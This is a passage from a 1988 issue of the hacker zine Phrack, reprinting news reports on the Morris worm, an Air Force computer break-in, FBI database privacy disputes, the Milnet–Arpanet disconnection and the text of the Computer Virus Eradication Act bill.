  4444. stations or systems - appears not to require the government to prove criminal
  4445. intent, a requirement that lawyers have described as a possible barrier to
  4446. successful prosecution in the case.
  4447.  
  4448. Sessions told a press conference at FBI headquarters that the preliminary phase
  4449. of the investigation should be completed in two weeks and defended the pace of
  4450. the inquiry in which Morris, a Cornell University graduate student, has not yet
  4451. been interviewed.  Friends of Morris, age 23, have said he told them that he
  4452. created the virus.
  4453.  
  4454. Sources have said that FBI agents have not sought to question Morris until they
  4455. obtain the detailed electronic records of the programming he used in setting
  4456. loose the virus - records that have been maintained under seal at Cornell
  4457. University.
  4458.  
  4459. In addition to the malicious mischief statue, which carries a maximum penalty
  4460. of 10 years in prison, Sessions listed fraud by wire as one of the laws being
  4461. considered.
  4462. _______________________________________________________________________________
  4463. =========================================================================
  4464.  
  4465.                                 ==Phrack Inc.==
  4466.  
  4467.                      Volume Two, Issue 22, File 11 of 12
  4468.  
  4469.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  4470.             PWN                                                 PWN
  4471.             PWN        P h r a c k   W o r l d   N e w s        PWN
  4472.             PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
  4473.             PWN                Issue XXII/Part 3                PWN
  4474.             PWN                                                 PWN
  4475.             PWN           Created by Knight Lightning           PWN
  4476.             PWN                                                 PWN
  4477.             PWN              Written and Edited by              PWN
  4478.             PWN         Knight Lightning and Taran King         PWN
  4479.             PWN                                                 PWN
  4480.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  4481.  
  4482.  
  4483. Computer Break-In                                             November 11, 1988
  4484. ~~~~~~~~~~~~~~~~~
  4485. >From Intercom, Vol 28, No. 24, Air Force Communications Command Newsletter
  4486. By Special Agent Mike Forche, AFOSI Computer Crime Investigator
  4487.  
  4488. A computer hacker penetrated an Air Force Sperry 1160 computer system in the
  4489. San Antonio, Texas, area.  The hacker was discovered by alert Air Force
  4490. Communications Command computer operators who notified the data base
  4491. administrator than an un-authorized user was in the system.  The data base
  4492. administrator was able to identify the terminal, password, and USERID (system
  4493. level) used by the hacker.
  4494.  
  4495. The data base administrator quickly disabled the USERID/password (which
  4496. belonged to a computer system monitor).  The data base administrator then
  4497. observed the hacker trying to get into the system using the old
  4498. USERID/password.  He watched as the hacker successfully gained entry into the
  4499. system using another unauthorized USERID/password (which was also a system
  4500. administrator level password).
  4501.  
  4502. The hacker was an authorized common user in the computer system; however, he
  4503. obtained system administrator access level to the government computer on both
  4504. occasions.
  4505.  
  4506. Review of the audit trail showed that the hacker had successfully gained
  4507. unauthorized access to the computer every day during the two weeks the audit
  4508. was run.  In addition, the hacker got unauthorized access to a pay file and
  4509. instructed the computer floor operator to load a specific magnetic tape (pay
  4510. tape).
  4511.  
  4512. The hacker was investigated by Air Force Office of Special Investigation
  4513. computer crime investigators for violation of federal crimes (Title 18 US Codes
  4514. 1030 computer fraud, and 641 wrongful conversion of government property), Texas
  4515. state crimes (Title 7, Section 33.02 Texas computer crime wrongful access) and
  4516. military crimes (obtaining services under false pretense, Uniform Code of
  4517. Military Justice, Article 134).
  4518.  
  4519. The computer crime investigators made the following observations:
  4520.  
  4521.   - USERIDs used by the hacker were the same ones he used at his last base when
  4522.     he had authorized system access in his job.  The use of acronyms and
  4523.     abbreviations of job titles will hardly fool anyone; plus the use of
  4524.     standard USERID base to base is dangerous.
  4525.  
  4526.   - The passwords the hacker used were the first names of the monitors who
  4527.     owned the USERIDs.  The use of names, phone numbers, and other common
  4528.     easily-guessed items have time and time again been beaten by even the
  4529.     unsophisticated hackers.
  4530.  
  4531.                     Special Thanks To Major Douglas Hardie
  4532. _______________________________________________________________________________
  4533.  
  4534. "Big Brotherish" FBI Data Base Assailed                      November, 21, 1988
  4535. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4536. >From Knight-Ridder Newspapers (Columbia Daily Tribune)
  4537.  
  4538.                "Professionals Unite To Halt Expansion Of Files"
  4539.  
  4540. PALO ALTO, California -- For the first time in more than a decade, civil
  4541. libertarians and computer professionals are banding together to stop what many
  4542. consider a Big Brotherish attempt by the FBI to keep track of people's lives.
  4543.  
  4544. Computer Professionals for Social Responsibility, based in Palo Alto, has been
  4545. instrumental in preventing the FBI from expanding its data base to include
  4546. information such as credit card transactions, telephone calls, and airline
  4547. passenger lists.
  4548.  
  4549. "We need computer professionals acting like public interest lawyers to make
  4550. sure the FBI is acting responsibly," said Jerry Berman, chief legislative
  4551. counsel for the American Civil Liberties Union.
  4552.  
  4553. Berman was part of a panel Saturday at Stanford University that went
  4554. head-to-head with the FBI's assistant director for technical services, William
  4555. Bayse, over expansion of the National Crime Information Center.
  4556.  
  4557. Law enforcement officials use the NCIC system's 19.4 million files about
  4558. 700,000 times a day for routine checks on everyone from traffic violators to
  4559. Peace Corps applicants.
  4560.  
  4561. "The FBI would like us to believe that they are protecting us from the hick
  4562. Alabama sheriff who wants to misuse the system," said Brian Harvey, a computer
  4563. expert at the University of California-Berkeley.  "The FBI is the problem."
  4564.  
  4565. Not since the fight to pass the Privacy Act of 1974 have computer experts,
  4566. civil libertarians, and legislators come together on the issue of citizen
  4567. rights and access to information.
  4568.  
  4569. In the early 1970s, the government's efforts to monitor more than 125,000 war
  4570. protesters sparked concerns about privacy.  The 1974 law limited the movement
  4571. of information exchanged by federal agencies.
  4572.  
  4573. But computers were not so sophisticated then, and the privacy act has a number
  4574. of exceptions for law enforcement agencies, Rotenberg said.  No laws curtail
  4575. the FBI's data base.
  4576.  
  4577. Two years ago, the FBI announced its plan to expand the data base and came up
  4578. with 240 features to include, a sort of "wish list" culled from the kinds of
  4579. information law enforcement officials who use the system would like to have.
  4580.  
  4581. Rep. Don Edwards, D-Calif., balied at moving ahead with the plan without
  4582. suggestions from an independent group, and put together a panel that includes
  4583. members of the Palo Alto computer organization.
  4584.  
  4585. Working with Bayse, FBI officials eventually agreed to recommend a truncated
  4586. redesign of the data base.  It drops the most controversial features, such as
  4587. plans to connect the data base to records of other government agencies -
  4588. including the Securities and Exchange Commission, the IRS, the Immigration and
  4589. Naturalization Service, the Social Security Administration, and the Department
  4590. of State's passport office.
  4591.  
  4592. But FBI director William Sessions could reject those recommendations and
  4593. include all or part of the wish list in the redesign.
  4594.  
  4595. The 20-year-old system has 12 main files containing information on stolen
  4596. vehicles, missing people, criminal arrests and convictions, people who are
  4597. suspected of plotting against top-level government officials, and people for
  4598. whom arrest warrents have been issued.
  4599. _______________________________________________________________________________
  4600.  
  4601.  
  4602. Big Guns Take Aim At Virus                                    November 21, 1988
  4603. ~~~~~~~~~~~~~~~~~~~~~~~~~~
  4604. Taken From Government Computer News
  4605.  
  4606. In the aftermath of the most recent virus infection of the Defense Data Network
  4607. and Arpanet, Defense Department and National Institute of Standards and
  4608. Technology computer security officials are scrambling to head off further
  4609. attacks.
  4610.  
  4611. Officials of the facilities struck by the virus met this month to discuss its
  4612. nature and impact. The meeting at National Security Agency headquarters in Fort
  4613. Meade, Md., included representatives of NSA and NIST as 'observers,' according
  4614. to NIST computer security chief Stuart Katzke.
  4615.  
  4616. Two days later, NSA and NIST officials met again to discuss how to avert future
  4617. infections, Katzke said.  Katzke, who attended both meetings, said no decisions
  4618. had been reached on how to combat viruses, and NSA and NIST representatives
  4619. will meet again to firm up recommendations.
  4620.  
  4621. Katzke, however, suggested one solution would be the formation of a federal
  4622. center for anti-virus efforts, operated jointly by NSA's National Computer
  4623. Security Center (NCSC) and NIST.
  4624.  
  4625. The center would include a clearinghouse that would collect and disseminate
  4626. information about threats, such as flaws in operating systems, and solutions.
  4627. However, funding and personnel for the center is a problem, he said, because
  4628. NIST does not have funds for such a facility.
  4629.  
  4630. The center also would help organize responses to emergencies by quickly warning
  4631. users of new threats and defenses against them, he said.  People with solutions
  4632. to a threat could transmit their answers through the center to threatened
  4633. users, he said.  A database of experts would be created to speed response to
  4634. immediate threats.
  4635.  
  4636. The center would develop means of correcting flaws in software, such as
  4637. trapdoors in operating systems.  Vendors would be asked to develop and field
  4638. solutions, he said.
  4639.  
  4640. NIST would work on unclassified systems and the NCSC would work on secure
  4641. military systems, he said.  Information learned about viruses from classified
  4642. systems might be made available to the public through the clearinghouse, Katzke
  4643. said, although classified information would have to be removed first.
  4644.  
  4645. Although the virus that prompted these meetings did not try to destroy data, it
  4646. made so many copies of itself that networks rapidly became clogged, greatly
  4647. slowing down communications.  Across the network, computer systems
  4648. crashed as the virus continuously replicated itself.
  4649.  
  4650. During a Pentagon press conference on the virus outbreak, Raymond Colladay,
  4651. director of the Defense Advanced Research Projects Agency (DARPA), said the
  4652. virus hit 'several dozen' installations out of 300 on the agency's unclassified
  4653. Arpanet network.
  4654.  
  4655. Thousands Affected
  4656.  
  4657. The virus also was found in Milnet, which is the unclassified portion of the
  4658. Defense Data Network.  Estimates of how many computers on the network were
  4659. struck varied from 6,000 to 250,000.  The virus did not affect any classified
  4660. systems, DOD officials said.
  4661.  
  4662. The virus hit DARPA computers in Arlington, Va., and the Lawrence Livermore
  4663. Laboratories in California as well as many academic institutions, Colladay
  4664. said.  It also affected the Naval Ocean Systems Command in San Diego and the
  4665. Naval Research Laboratory in Maryland, a Navy spokesman said.
  4666.  
  4667. Written in C and aimed at the UNIX operating system running on Digital
  4668. Equipment Corp. VAX and Sun Microsystems Inc. computers, the virus was released
  4669. November 2, 1988 into Arpanet through a computer at the Massachusetts Institute
  4670. of Technology in Cambridge, Mass.
  4671.  
  4672. The Virus apparently was intended to demonstrate the threat to networked
  4673. systems.  Published reports said the virus was developed and introduced by a
  4674. postgraduate student at Cornell University who specializes in computer
  4675. security.  The FBI has interviewed the student.
  4676.  
  4677. Clifford Stoll, a computer security expert at Harvard University who helped
  4678. identify and neutralize the virus, said the virus was about 40 kilobytes long
  4679. and took 'several weeks' to write.  It replicated itself in three ways.
  4680.  
  4681. Spreading the Virus
  4682.  
  4683. The first method exploited a little-known trapdoor in the Sendmail
  4684. electronic-mail routine of Berkeley UNIX 4.3, Stoll said. The trapdoor was
  4685. created by a programmer who wanted to remove some bugs, various reports said.
  4686. However, the programmer forgot to remove the trapdoor in the final production
  4687. version.  In exploiting this routine, the virus tricked the Sendmail program
  4688. into distributing numerous copies of the virus across the network.
  4689.  
  4690. Another method used by the virus was an assembly language program that found
  4691. user names and then tried simple variations to crack poorly conceived passwords
  4692. and break into more computers, Stoll said.
  4693.  
  4694. Yet another replication and transmission method used a widely known bug in the
  4695. Arpanet Finger program, which lets users know the last time a distant user has
  4696. signed onto a network.  By sending a lengthy Finger signal, the virus gained
  4697. access to the operating systems of Arpanet hosts.
  4698.  
  4699. The virus was revealed because its creator underestimated how fast the virus
  4700. would attempt to copy itself.  Computers quickly became clogged as the virus
  4701. rapidly copied itself, although it succeeded only once in every 10 copy
  4702. attempts.
  4703.  
  4704. Users across the country developed patches to block the virus' entrance as soon
  4705. as copies were isolated and analyzed.  Many users also used Arpanet to
  4706. disseminate the countermeasures, although transmission was slowed by the
  4707. numerous virus copies in the system.
  4708.  
  4709. DARPA officials 'knew precisely what the problem was,' Colladay said.
  4710. 'Therefore, we knew precisely what the fix was. As soon as we had put that fix
  4711. in place, we could get back online.'
  4712.  
  4713. Colladay said DARPA will revise security policy on the network and will decide
  4714. whether more security features should be added.  The agency began a study of
  4715. the virus threat two days after the virus was released, he said.
  4716.  
  4717. All observers said the Arpanet virus helped raise awareness of the general
  4718. virus threat.  Several experts said it would help promote computer security
  4719. efforts.  'Anytime you have an event like this it heightens awareness and
  4720. sensitivity,' Colladay said.
  4721.  
  4722. However, Katzke cautioned that viruses are less of a threat than are access
  4723. abusers and poor management practices such as inadequate disaster protection or
  4724. password control.  Excellent technical anti-virus defenses are of no use if
  4725. management does not maintain proper control of the system, he said.
  4726.  
  4727. Congress also is expected to respond to the virus outbreak.  The Computer Virus
  4728. Eradication Act of 1988, which lapsed when Congress recessed in October, will
  4729. be reintroduced by Rep. Wally Herger (R-Calif.), according to Doug Griggs, who
  4730. is on Herger's staff.
  4731. _______________________________________________________________________________
  4732.  
  4733. Congressmen Plan Hearings On Virus                            November 27, 1988
  4734. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4735. >From The Seattle Times (Newhouse News Services)
  4736.  
  4737. WASHINGTON - The computer virus that raced through a Pentagon data network
  4738. earlier this month is drawing the scrutiny of two congressional committee
  4739. chairmen who say they plan hearings on the issue during the 101st Congress.
  4740.  
  4741. Democratic Reps. Robert Roe, chairman of the House Science Space and Technology
  4742. Committee, and William Hughes, chairman of the crime subcommittee of the House
  4743. Judiciary Committee, say they want to know more about the self-replicating
  4744. program that invaded thousands of computer systems.
  4745.  
  4746. The two chairmen, both from New Jersey, say the are concerned about how
  4747. existing federal law applies to the November 2, 1988 incident in which a
  4748. 23-year-old computer prodigy created a program that jammed thousands of
  4749. computers at universities, research centers, and the Pentagon.
  4750.  
  4751. Roe said his committee also will be looking at ways to protect vital federal
  4752. computers from similar viruses.
  4753.  
  4754. "As we move forward and more and more of our national security is dependent on
  4755. computer systems, we have to think more about the security and safety of those
  4756. systems," Roe said.
  4757.  
  4758. Hughes, author of the nation's most far-reaching computer crime law, said his
  4759. 1986 measure is applicable in the latest case.  He said the law, which carries
  4760. criminal penalties for illegally accessing and damaging "federal interest"
  4761. computers, includes language that would cover computer viruses.
  4762.  
  4763. "There is no question but that the legislation we passed in 1986 covers the
  4764. computer virus episodes,' Hughes said.  Hughes noted that the law also includes
  4765. a section creating a misdemeanor offense for illegally entering a
  4766. government-interest computer.  The network invaded by the virus, which included
  4767. Pentagon research computers, would certainly meet the definition of a
  4768. government-interest computer, he said.
  4769.  
  4770. "The 1986 bill attempted to anticipate a whole range of criminal activity
  4771. that could involve computers," he said.
  4772. _______________________________________________________________________________
  4773.  
  4774. Pentagon Severs Military Computer From Network Jammed By Virus    Nov. 30, 1988
  4775. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4776. By John Markoff  (New York Times)
  4777.  
  4778. NEW YORK - The Pentagon said on Wednesday that it had temporarily severed the
  4779. connections between a nonclassifed military computer network and the nationwide
  4780. academic research and corporate computer network that was jammed last month by
  4781. a computer virus program.
  4782.  
  4783. Department of Defense officials said technical difficulties led to the move.
  4784. But several computer security experts said they had been told by Pentagon
  4785. officials that the decision to cut off the network was made after an unknown
  4786. intruder illegally gained entry recently to several computers operated by the
  4787. military and defense contractors.
  4788.  
  4789. Computer specialists said they thought that the Pentagon had broken the
  4790. connections while they tried to eliminate a security flaw in the computers in
  4791. the military network.
  4792.  
  4793. The Department of Defense apparently acted after a computer at the Mitre
  4794. Corporation, a Bedford, Mass., company with several military contracts, was
  4795. illegally entered several times during the past month.  Officials at several
  4796. universities in the United States and Canada said their computers had been used
  4797. by the intruder to reach the Mitre computer.
  4798.  
  4799. A spokeswoman for Mitre confirmed Wednesday that one of its computers had been
  4800. entered, but said no classified or sensitive information had been handled by
  4801. the computers involved.  "The problem was detected and fixed within hours with
  4802. no adverse consequences," Marcia Cohen said.
  4803.  
  4804. The military computer network, known as Milnet, connects hundreds of computers
  4805. run by the military and businesses around the country and is linked through
  4806. seven gateways to another larger computer network, Arpanet.  It was Arpanet
  4807. that was jammed last month when Robert T. Morris, a Cornell University
  4808. graduate student, introduced a rogue program that jammed computers on the
  4809. network.
  4810.  
  4811. In a brief statement, a spokesman at the Defense Communication Agency said the
  4812. ties between Milnet and Arpanet, known as mail bridges, were severed at 10 p.m.
  4813. Monday and that the connections were expected to be restored by Thursday.
  4814.  
  4815. "The Defense Communications Agency is taking advantage of the loop back to
  4816. determine what the effects of disabling the mail bridges are," the statement
  4817. said.  "The Network Information Center is collecting user statements and
  4818. forwarding them to the Milnet manager."
  4819.  
  4820. Several computer security experts said they had been told that the network
  4821. connection, which permits military and academic researchers to exchange
  4822. information, had been cut in response to the intruder.  "We tried to find out
  4823. what was wrong (Tuesday night) after one of our users complained that he could
  4824. not send mail," said John Rochlis, assistant network manager at the
  4825. Massachusetts Institute of Technology.  "Inititally we were given the run
  4826. around, but eventually they unofficially confirmed to us that the shut-off was
  4827. security related."
  4828.  
  4829. Clifford Stoll, a computer security expert at Harvard University, posted an
  4830. electronic announcement on Arpanet Wednesday that Milnet was apparently
  4831. disconnected as a result of someone breaking into several computers.
  4832.  
  4833. Several university officials said the intruder had shielded his location by
  4834. routing telephone calls from his computer through several networks.
  4835.  
  4836. A manager at the Mathematics Faculty Computer Facility at the University of
  4837. Waterloo in Canada said officials there learned that one of their computers had
  4838. been illegally entered after receiving a call from Mitre.
  4839.  
  4840. He said the attacker had reached the Waterloo computer from several computers,
  4841. including machines located at MIT, Stanford, the University of Washington and
  4842. the University of North Carolina. He said that the attacks began on November 3,
  4843. 1988 and that some calls had been routed from England.
  4844.  
  4845. A spokeswoman for the Defense Communications Agency said that she had no
  4846. information about the break-in.
  4847.  
  4848. Stoll said the intruder used a well-known computer security flaw to illegally
  4849. enter the Milnet computers.  The flaws are similar to those used by Morris'
  4850. rogue program.
  4851.  
  4852. It involves a utility program called "file transfer protocol (FTP" that is
  4853. intended as a convenience to permit remote users to transfer data files and
  4854. programs over the network.  The flaw is found in computers that run the Unix
  4855. operating system.
  4856.  
  4857. The decision to disconnect the military computers upset a number of computer
  4858. users around the country.  Academic computer security experts suggested that
  4859. the military may have used the wrong tactic to attempt to stop the illegal use
  4860. of its machines.
  4861.  
  4862. "There is a fair amount of grumbling going on," said Donald Alvarez, an MIT
  4863. astrophysicist.  "People think that this is an unreasonable approach to be
  4864. taking."
  4865.  
  4866. He said that the shutting of the mail gateways did not cause the disastrous
  4867. computer shutdown that was created when the rogue program last month stalled as
  4868. many as 6,000 machines around the country.
  4869.  
  4870. [The hacker suspected of breaking into MIT is none other than Shatter.  He
  4871. speaks out about the hacker community in PWN XXII/4.   -KL]
  4872. _______________________________________________________________________________
  4873.  
  4874. MCI's New Fax Network                                             December 1988
  4875. ~~~~~~~~~~~~~~~~~~~~~
  4876. >From Teleconnect Magazine
  4877.  
  4878. MCI introduced America's first dedicated fax network.  It's available now.  The
  4879. circuit-switched network, called MCI FAX, takes a slice of MCI's existing
  4880. bandwidth and configures it with software to handle only fax transmissions.
  4881. Customers - even MCI customers - have to sign up separately for the service,
  4882. though there's currently no fee to join.
  4883.  
  4884. Users must dedicate a standard local phone line (e.g. 1MB) to each fax machine
  4885. they want on the MCI network (the network doesn't handle voice) and in return
  4886. get guaranteed 9600 baud transmission, and features like management reports,
  4887. customized dialing plans, toll-free fax, cast fax, several security features,
  4888. delivery confirmation and a separate credit card.
  4889.  
  4890. The system does some protocol conversion, fax messages to PCs, to telex
  4891. machines or from a PC via MCI Mail to fax.  The service is compatible with any
  4892. make or model of Group III and below fax machine and will be sold, under a new
  4893. arrangement for MCI, through both a direct sales force and equipment
  4894. manufacturers, distributors and retailers.  For more info 1-800-950-4FAX.  MCI
  4895. wouldn't release pricing, but it said it would be cheaper.
  4896. _______________________________________________________________________________
  4897.  
  4898. Military Bans Data Intruder                                    December 2, 1988
  4899. ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4900. Compiled From News Services
  4901.  
  4902. NEW YORK -- The Pentagon has cut the connections between a military computer
  4903. network (MILNET) and an academic research network (ARPANET) that was jammed
  4904. last month by a "computer virus."
  4905.  
  4906. The Defense Department acted, not because of the virus, but rather because an
  4907. unknown intruder had illegally gained entry to several computers operated by
  4908. the armed forces and by defense contractors, several computer security experts
  4909. said.
  4910.  
  4911. The Defense Department apparently acted after a computer at the Mitre
  4912. Corporation of Bedford, Mass., a company with several military contracts, was
  4913. illegally entered several times in the past month.
  4914.  
  4915. Officials at several universities in the United States and Canada said their
  4916. computers had been used by the intruder to reach the Mitre computer.
  4917.  
  4918. A spokeswoman for Mitre confirmed Wednesday that one of its computers had been
  4919. entered, but said no classified or sensitive information had been handled by
  4920. the computers involved.
  4921.  
  4922. "The problem was detected and fixed within hours, with no adverse
  4923. consequences," Marcia Cohen, the spokeswoman said.
  4924.  
  4925. The military computer network, known as Milnet, connects hundreds of computers
  4926. run by the armed forces and businesses around the country and is linked through
  4927. seven gateways to another larger computer network, Arpanet.  Arpanet is the
  4928. network that was jammed last month by Robert T. Morris, a Cornell University
  4929. graduate student.
  4930. _______________________________________________________________________________
  4931. =========================================================================
  4932.  
  4933.                                 ==Phrack Inc.==
  4934.  
  4935.                      Volume Two, Issue 22, File 12 of 12
  4936.  
  4937.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  4938.             PWN                                                 PWN
  4939.             PWN        P h r a c k   W o r l d   N e w s        PWN
  4940.             PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
  4941.             PWN                Issue XXII/Part 4                PWN
  4942.             PWN                                                 PWN
  4943.             PWN           Created by Knight Lightning           PWN
  4944.             PWN                                                 PWN
  4945.             PWN              Written and Edited by              PWN
  4946.             PWN         Knight Lightning and Taran King         PWN
  4947.             PWN                                                 PWN
  4948.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  4949.  
  4950.  
  4951. Networks Of Computers At Risk From Invaders                    December 3, 1988
  4952. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4953. By John Markoff  (New York Times)
  4954.  
  4955. Basic security flaws similar to the ones that let intruders gain illegal entry
  4956. to military computer networks in recent weeks are far more common than is
  4957. generally believed, system designers and researchers say.
  4958.  
  4959. And there is widespread concern that computer networks used for everyday
  4960. activities like making airline reservations and controlling the telephone
  4961. system are highly vulnerable to attacks by invaders considerably less skilled
  4962. than the graduate student whose rogue program jammed a nationwide computer
  4963. network last month.
  4964.  
  4965. For example, the air traffic control system could be crippled if someone
  4966. deliberately put wrong instructions into the network, effectively blinding
  4967. controllers guiding airplanes.
  4968.  
  4969. The two recent episodes have involved military computers:  One at the Mitre
  4970. Corporation, a company with Pentagon contracts, and the other into Arpanet, a
  4971. Defense Department network with links to colleges.  But illegal access to
  4972. computer systems can compromise the privacy of millions of people.
  4973.  
  4974. In 1984, TRW Inc. acknowledged that a password providing access to 90 million
  4975. credit histories in its files had been stolen and posted on a computerized
  4976. bulletin board system.  The company said the password may have been used for as
  4977. long as a month.
  4978.  
  4979. This year an internal memorandum at Pacific Bell disclosed that sophisticated
  4980. invaders had illegally gained access to telephone network switching equipment
  4981. to enter private company computers and monitor telephone conversations.
  4982.  
  4983. Computer security flaws have also been exploited to destroy data.  In March
  4984. 1986 a computer burglar gained access by telephone to the office computer of
  4985. Rep. Ed Zschau of California, destroyed files and caused the computer to break
  4986. down.  Four days later, staff workers for Rep. John McCain of Arizona, now a
  4987. senator, told the police they had discovered that someone outside their office
  4988. had reached into McCain's computer and destroyed hundreds of letters and
  4989. mailing addresses.
  4990.  
  4991. In Australia last year, a skilled saboteur attacked dozens of computers by
  4992. destroying an underground communication switch.  The attack cut off thousands
  4993. of telephone lines and rendered dozens of computers, including those at the
  4994. country's largest banks, useless for an entire day.
  4995.  
  4996. Experts say the vulnerability of commercial computers is often compounded by
  4997. fundamental design flaws that are ignored until they are exposed in a glaring
  4998. incident.  "Some vulnerabilities exist in every system," said Peter Neumann, a
  4999. computer scientist at SRI International in Menlo Park, California.  "In the
  5000. past, the vendors have not really wanted to recognize this."
  5001.  
  5002. Design flaws are becoming increasingly important because of the rapidly
  5003. changing nature of computer communications. Most computers were once isolated
  5004. from one another.  But in the last decade networks expanded dramatically,
  5005. letting computers exchange information and making virtually all large
  5006. commercial systems accessible from remote places.  But computer designers
  5007. seeking to shore up security flaws face a troubling paradox:  By openly
  5008. discussing the flaws, they potentially make vulnerabilities more known and thus
  5009. open to sabotage.
  5010.  
  5011. Dr. Fred Cohen, a computer scientist at the University of Cincinnati, said most
  5012. computer networks were dangerously vulnerable.  "The basic problem is that we
  5013. haven't been doing networks long enough to know how to implement protection,"
  5014. Cohen said.
  5015.  
  5016. The recent rogue program was written by Robert Tappan Morris, a 23-year-old
  5017. Cornell University graduate student in computer science, friends of his have
  5018. said.  The program appears to have been designed to copy itself harmlessly from
  5019. computer to computer in a Department of Defense network, the Arpanet.  Instead
  5020. a design error caused it to replicate madly out of control, ultimately jamming
  5021. more than 6,000 computers in this country's most serious computer virus attack.
  5022.  
  5023. For the computer industry, the Arpanet incident has revealed how security flaws
  5024. have generally been ignored.  Cohen said most networks, in effect, made
  5025. computers vulnerable by placing entry passwords and other secret information
  5026. inside every machine.  In addition, most information passing through networks
  5027. is not secretly coded.  While such encryption would solve much of the
  5028. vulnerability problem, it would be costly.  It would also slow communication
  5029. between computers and generally make networks much less flexible and
  5030. convenient.
  5031.  
  5032. Encryption of data is the backbone of security in computers used by military
  5033. and intelligence agencies. The Arpanet network, which links computers at
  5034. colleges, corporate research centers and military bases, is not encrypted.
  5035.  
  5036. The lack of security for such information underscored the fact that until now
  5037. there has been little concern about protecting data.
  5038.  
  5039. Most commercial systems give the people who run them broad power over all parts
  5040. of the operation.  If an illicit user obtains the privileges held by a system
  5041. manager, all information in the system becomes accessible to tampering.
  5042.  
  5043. The federal government is pushing for a new class of military and intelligence
  5044. computer in which all information would be divided so that access to one area
  5045. did not easily grant access to others, even if security was breached.  The goal
  5046. is to have these compartmentalized security systems in place by 1992.
  5047.  
  5048. On the other hand, one of the most powerful features of modern computers is
  5049. that they permit many users to share information easily; this is lost when
  5050. security is added.
  5051.  
  5052. In 1985 the Defense Department designed standards for secure computer systems,
  5053. embodied in the Orange Book, a volume that defines criteria for different
  5054. levels of computer security.  The National Computer Security Center, a division
  5055. of the National Security Agency, is now charged with determining if government
  5056. computer systems meet these standards.
  5057.  
  5058. But academic and private computer systems are not required to meet these
  5059. standards, and there is no federal plan to urge them on the private sector. But
  5060. computer manufacturers who want to sell their machines to the government for
  5061. military or intelligence use must now design them to meet the Pentagon
  5062. standards.
  5063.  
  5064. Security weaknesses can also be introduced inadvertently by changes in the
  5065. complex programs that control computers, which was the way Morris's program
  5066. entered computers in the Arpanet.  These security weaknesses can also be
  5067. secretly left in by programmers for their convenience.
  5068.  
  5069. One of the most difficult aspects of maintaining adequate computer security
  5070. comes in updating programs that might be running at thousands of places around
  5071. the world once flaws are found.
  5072.  
  5073. Even after corrective instructions are distributed, many computer sites often
  5074. do not close the loopholes, because the right administrator did not receive the
  5075. new instructions or realize their importance.
  5076. _______________________________________________________________________________
  5077.  
  5078. Computer Virus Eradication Act of 1988                         December 5, 1988
  5079. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5080. The following is a copy of HR-5061, a new bill being introduced in the House by
  5081. Wally Herger (R-CA) and Robert Carr (D-Mich.).
  5082. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  5083. 100th Congress 2D Session                                             H.R. 5061
  5084.  
  5085. To amend title 18, United States Code, to provide penalties for persons
  5086. interfering with the operations of computers through the use of programs
  5087. containing hidden commands that can cause harm, and for other purposes.
  5088.  
  5089. IN THE HOUSE OF REPRESENTATIVES                                   July 14, 1988
  5090. Mr. Herger (for himself and Mr. Carr) introduced the following bill; which was
  5091. referred to the Committee on the Judiciary
  5092.  
  5093. A BILL
  5094. To ammend title 18, United States Code, to provide penalties for persons
  5095. interfering with the operations of computers through the use of programs
  5096. containing hidden commands that can cause harm, and for other purposes.
  5097.  
  5098.                                    -   -   -
  5099.  
  5100. Be it enacted by the Senate and House of Representatives of the United States
  5101. of America in Congress assembled,
  5102.  
  5103. SECTION 1. SHORT TITLE.
  5104.            This Act may be cited as the "Computer Virus Eradication Act of
  5105.            1988".
  5106.  
  5107. SECTION 2. TITLE 18 AMENDMENT.
  5108.            (A) IN GENERAL.- Chapter 65 (relating to malicious mischief) of
  5109.            title 18, United States Code, is amended by adding at the end the
  5110.            following:
  5111.  
  5112.            S 1368.  Disseminating computer viruses and other harmful computer
  5113.                     programs
  5114.           (a) Whoever knowingly --
  5115.              (1) inserts into a program for a computer information or commands,
  5116.                  knowing or having reason to believe that such information or
  5117.                  commands will cause loss to users of a computer on which such
  5118.                  program is run or to those who rely on information processed
  5119.                  on such computer; and
  5120.              (2) provides such a program to others in circumstances in which
  5121.                  those others do not know of the insertion or its effects; or
  5122.                  attempts to do so, shall if any such conduct affects
  5123.                  interstate or foreign commerce, be fined under this title or
  5124.                  imprisoned not more than 10 years, or both.
  5125.           (b) Whoever suffers loss by reason of a violation of subsection (a)
  5126.               may, in a civil action against the violator, obtain appropriate
  5127.               relief.  In a civil action under this section, the court may
  5128.               award to the prevailing party a reasonable attorney's fee and
  5129.               other litigation expenses.
  5130.  
  5131.  
  5132.            (B) CLERICAL AMENDMENT.- The table of sections at the begining of
  5133.            chapter 65 of title 18, United States Code, is amended by adding at
  5134.            the end the following:
  5135.            S 1368.  Disseminating computer viruses and other harmful computer
  5136.                     programs.
  5137.  
  5138. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  5139. NOTE:  The above text was typed in by hand from a printed copy of HR5 061.
  5140.        There is a possibility that there may be typographical errors which
  5141.        could affect the nature of the bill.
  5142.  
  5143.        For an official copy of the bill, please contact:
  5144.  
  5145.                                 Mr. Doug Riggs
  5146.                               1108 Longworth Bldg
  5147.                             Washington D.C.  20515
  5148.  
  5149.                            Information Presented by
  5150.                Don Alvarez of the MIT Center For Space Research
  5151. _______________________________________________________________________________
  5152.  
  5153. Virus Conference In Arlington, Virginia                        December 5, 1988
  5154. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5155. Entitled "Preventing and Containing Computer Virus Attacks", it takes place
  5156. January 30-31, in Arlington, VA.  Speakers include Representative Wally Herger
